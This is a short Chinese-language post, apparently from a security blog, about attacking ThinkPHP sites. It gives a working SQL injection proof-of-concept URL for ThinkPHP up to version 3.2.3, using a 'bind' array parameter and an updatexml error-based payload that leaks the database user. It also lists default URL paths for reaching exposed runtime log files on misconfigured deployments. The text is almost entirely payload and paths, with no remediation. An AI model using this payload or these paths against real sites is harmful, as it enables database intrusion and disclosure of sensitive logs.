一、(<= 3.2.3)ThinkPHP Builder.php SQL注入漏洞
这是poc:
http://192.168.3.6/Home/Index/readcategorymsg?category[0]=bind&category[1]=0 and(updatexml(1,concat(0x7e,(user())),0))
category是数组:
0:"bind"
1:"0 and(updatexml(1,concat(0x7e,(user())),0))"
二、配置不当,日志文件泄露
http://域名/应用名(默认为Application,很多开发者不会改它)/Runtime/Logs/组名(默认为Home或者Index,很多开发者不会改它)/18_08_15.log
/Application/Runtime/Logs/Home/19_12_15.log
网友评论